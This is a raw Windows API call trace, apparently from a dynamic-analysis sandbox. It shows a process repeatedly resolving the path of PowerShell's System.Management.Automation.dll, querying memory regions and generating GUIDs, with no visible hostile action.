	[0143.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.745] VirtualQuery (in: lpAddress=0x14b1e0, lpBuffer=0x14c0a0, dwLength=0x30 | out: lpBuffer=0x14c0a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.745] VirtualQuery (in: lpAddress=0x14b270, lpBuffer=0x14c130, dwLength=0x30 | out: lpBuffer=0x14c130*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.746] VirtualQuery (in: lpAddress=0x14b490, lpBuffer=0x14c350, dwLength=0x30 | out: lpBuffer=0x14c350*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.747] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x1fbecf3, Data2=0xb624, Data3=0x43ea, Data4=([0]=0xaa, [1]=0xa3, [2]=0x86, [3]=0x32, [4]=0xdb, [5]=0x24, [6]=0x8b, [7]=0xed))) returned 0x0
	[0143.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.749] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xdef07ae4, Data2=0xe06f, Data3=0x4a90, Data4=([0]=0xb1, [1]=0xbe, [2]=0x74, [3]=0xc, [4]=0x3a, [5]=0x16, [6]=0x7f, [7]=0xad))) returned 0x0
	[0143.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.751] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xaa49f85f, Data2=0x339c, Data3=0x4bfd, Data4=([0]=0x81, [1]=0xee, [2]=0x32, [3]=0x85, [4]=0xa1, [5]=0x82, [6]=0x96, [7]=0x2))) returned 0x0
	[0143.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.752] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x558c283b, Data2=0x5c5e, Data3=0x4dda, Data4=([0]=0x9b, [1]=0xff, [2]=0x18, [3]=0x8e, [4]=0x5, [5]=0xa8, [6]=0x6b, [7]=0x71))) returned 0x0
	[0143.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.753] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xc384c263, Data2=0x81b9, Data3=0x492e, Data4=([0]=0xbc, [1]=0x3c, [2]=0xf2, [3]=0x4, [4]=0x11, [5]=0x56, [6]=0x3, [7]=0x58))) returned 0x0
	[0143.753] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xe23918ef, Data2=0xceac, Data3=0x4552, Data4=([0]=0xbd, [1]=0x8, [2]=0xb4, [3]=0x28, [4]=0xe1, [5]=0x49, [6]=0xda, [7]=0xd))) returned 0x0
	[0143.753] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x1fbf79ff, Data2=0x752, Data3=0x4f33, Data4=([0]=0xb2, [1]=0x19, [2]=0x86, [3]=0x87, [4]=0x11, [5]=0x48, [6]=0xdd, [7]=0xa2))) returned 0x0
	[0143.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.754] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xe80420ed, Data2=0x99ad, Data3=0x41e6, Data4=([0]=0xa1, [1]=0xa8, [2]=0xdd, [3]=0x8d, [4]=0xc8, [5]=0xcd, [6]=0x41, [7]=0xff))) returned 0x0
	[0143.755] VirtualQuery (in: lpAddress=0x14b050, lpBuffer=0x14bf10, dwLength=0x30 | out: lpBuffer=0x14bf10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.756] VirtualQuery (in: lpAddress=0x14b050, lpBuffer=0x14bf10, dwLength=0x30 | out: lpBuffer=0x14bf10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.756] VirtualQuery (in: lpAddress=0x14b0e0, lpBuffer=0x14bfa0, dwLength=0x30 | out: lpBuffer=0x14bfa0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
